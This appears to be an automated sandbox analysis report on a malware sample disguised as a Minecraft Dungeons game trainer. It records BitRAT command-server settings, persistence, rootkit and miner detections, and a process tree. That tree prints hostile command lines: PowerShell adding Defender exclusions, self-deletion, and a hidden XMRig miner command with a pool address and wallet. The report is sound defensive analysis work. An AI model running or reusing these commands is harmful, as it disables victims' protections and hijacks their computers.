Analysis
-
max time kernel
162s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
10/03/2022, 13:31
Static task
static1
Behavioral task
behavioral1
Sample
62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
Resource
win7-20220223-en
General
-
Target
62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
-
Size
5.1MB
-
MD5
2394239524d152a87311e91311ab0abb
-
SHA1
784942496518b70fce9b81d5e85c2ea95bb0c89b
-
SHA256
62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128
-
SHA512
d75ca0028286079fc592f0704077cdebcde4f9c55a11350df521d70a97169a12aef2275be8cd408132620f418f9f5c5833bf6b21e837615f80f3afb193a01bb6
Malware Config
Extracted
bitrat
1.35
gumerez.xyz:1991
-
communication_password
c3e91d7657b11293c58a2efd9aa9262d
-
tor_process
tor
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\WindowUpdate.exe\"," WindowUpdate.exe -
r77 rootkit payload 2 IoCs
Detects the payload of the r77 rootkit.
resource yara_rule behavioral2/files/0x000300000001e532-137.dat r77_payload behavioral2/files/0x000300000001e532-138.dat r77_payload -
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral2/memory/3368-203-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3368-205-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3368-206-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 5 IoCs
pid Process 1984 Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe 2180 MicrosoftSecurity.exe 3632 WindowUpdate.exe 3004 InstallUtil.exe 3032 MSBuild.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation MicrosoftSecurity.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WindowUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 3004 InstallUtil.exe 3004 InstallUtil.exe 3004 InstallUtil.exe 3004 InstallUtil.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3768 set thread context of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 2180 set thread context of 3004 2180 MicrosoftSecurity.exe 75 PID 3632 set thread context of 3032 3632 WindowUpdate.exe 76 PID 3032 set thread context of 3368 3032 MSBuild.exe 82 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 684 3368 WerFault.exe 82 4048 3368 WerFault.exe 82 -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings MicrosoftSecurity.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings WindowUpdate.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 1624 powershell.exe 1624 powershell.exe 2180 MicrosoftSecurity.exe 2180 MicrosoftSecurity.exe 3632 WindowUpdate.exe 3632 WindowUpdate.exe 3836 powershell.exe 3836 powershell.exe 768 powershell.exe 3052 powershell.exe 768 powershell.exe 3052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe Token: SeDebugPrivilege 1984 Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe Token: SeDebugPrivilege 2180 MicrosoftSecurity.exe Token: SeDebugPrivilege 3632 WindowUpdate.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 3836 powershell.exe Token: SeShutdownPrivilege 3004 InstallUtil.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3004 InstallUtil.exe 3004 InstallUtil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3768 wrote to memory of 1488 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 63 PID 3768 wrote to memory of 1488 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 63 PID 3768 wrote to memory of 1488 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 63 PID 3768 wrote to memory of 648 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 64 PID 3768 wrote to memory of 648 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 64 PID 3768 wrote to memory of 648 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 64 PID 3768 wrote to memory of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 3768 wrote to memory of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 3768 wrote to memory of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 3768 wrote to memory of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 3768 wrote to memory of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 3768 wrote to memory of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 3768 wrote to memory of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 3768 wrote to memory of 428 3768 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 65 PID 428 wrote to memory of 1984 428 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 66 PID 428 wrote to memory of 1984 428 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 66 PID 428 wrote to memory of 2180 428 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 67 PID 428 wrote to memory of 2180 428 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 67 PID 428 wrote to memory of 2180 428 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 67 PID 428 wrote to memory of 3632 428 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 68 PID 428 wrote to memory of 3632 428 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe 68 PID 2180 wrote to memory of 1848 2180 MicrosoftSecurity.exe 69 PID 2180 wrote to memory of 1848 2180 MicrosoftSecurity.exe 69 PID 2180 wrote to memory of 1848 2180 MicrosoftSecurity.exe 69 PID 3632 wrote to memory of 1696 3632 WindowUpdate.exe 70 PID 3632 wrote to memory of 1696 3632 WindowUpdate.exe 70 PID 3632 wrote to memory of 1624 3632 WindowUpdate.exe 71 PID 3632 wrote to memory of 1624 3632 WindowUpdate.exe 71 PID 2180 wrote to memory of 768 2180 MicrosoftSecurity.exe 73 PID 2180 wrote to memory of 768 2180 MicrosoftSecurity.exe 73 PID 2180 wrote to memory of 768 2180 MicrosoftSecurity.exe 73 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 2180 wrote to memory of 3004 2180 MicrosoftSecurity.exe 75 PID 3632 wrote to memory of 3032 3632 WindowUpdate.exe 76 PID 3632 wrote to memory of 3032 3632 WindowUpdate.exe 76 PID 3632 wrote to memory of 3032 3632 WindowUpdate.exe 76 PID 3632 wrote to memory of 3032 3632 WindowUpdate.exe 76 PID 3632 wrote to memory of 3032 3632 WindowUpdate.exe 76 PID 3632 wrote to memory of 3032 3632 WindowUpdate.exe 76 PID 1848 wrote to memory of 3052 1848 WScript.exe 79 PID 1848 wrote to memory of 3052 1848 WScript.exe 79 PID 1848 wrote to memory of 3052 1848 WScript.exe 79 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82 PID 3032 wrote to memory of 3368 3032 MSBuild.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exeC:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe2⤵PID:1488
-
-
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exeC:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe2⤵PID:648
-
-
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exeC:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe"C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe"C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MicrosoftSecurity\MicrosoftSecurity.exe'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeC:\Users\Admin\AppData\Local\Temp\InstallUtil.exe4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3004
-
-
-
C:\Users\Admin\AppData\Roaming\WindowUpdate.exe"C:\Users\Admin\AppData\Roaming\WindowUpdate.exe"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Rtizxvdftafqcz.vbs"4⤵
- Checks computer location settings
PID:1696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WindowUpdate.exe'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\WindowUpdate.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=484hzHaCUfmXhMq4nCE1wcFuQ1TVa8BPjdq5oYseNQHoDWQXS8of2U9VLnQ1cL7TVzbRVyY1Su76CAdcDdHxjXrbRbec8LG.rig1/pandalord143 --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth5⤵PID:3368
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3368 -s 2926⤵
- Program crash
PID:684
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3368 -s 2966⤵
- Program crash
PID:4048
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 356 -p 3368 -ip 33681⤵PID:2608
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 3368 -ip 33681⤵PID:4068